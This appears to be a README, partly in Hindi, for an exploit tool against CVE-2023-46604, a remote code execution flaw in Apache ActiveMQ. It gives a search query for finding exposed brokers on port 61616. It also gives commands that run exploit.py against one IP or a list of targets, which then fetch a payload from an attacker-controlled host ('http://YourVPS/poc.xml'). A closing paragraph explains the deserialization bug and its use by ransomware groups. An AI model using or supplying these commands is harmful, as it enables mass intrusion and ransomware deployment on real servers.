
CVE-2023-46604 के लिए एक्सप्लॉइट
CVE-2023-46604 के लिए एक्सप्लॉइट
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 Apache ActiveMQ में एक गंभीर रिमोट कोड निष्पादन कमजोरी है, जो एक ओपन-सोर्स मैसेज ब्रोकर सॉफ्टवेयर है। यह कमजोरी एक रिमोट हमलावर को Java-आधारित OpenWire ब्रोकर या क्लाइंट तक नेटवर्क पहुंच रखने वाले को, मनमाने शेल कमांड निष्पादित करने की अनुमति देती है। यह OpenWire प्रोटोकॉल में सीरियलाइज्ड क्लास प्रकारों में हेरफेर करके प्राप्त किया जाता है, जिससे ब्रोकर क्लासपाथ पर किसी भी क्लास को इंस्टेंशिएट करने के लिए मजबूर हो जाता है। यह कमजोरी Apache ActiveMQ के अंदर असुरक्षित डिसीरियलाइजेशन से उत्पन्न होती है और हैलोकिट्टी रैनसमवेयर परिवार सहित हमलावरों द्वारा रैनसमवेयर बाइनरी चलाने और सिस्टम को पूरी तरह से समझौता करने के लिए इसका शोषण किया गया है।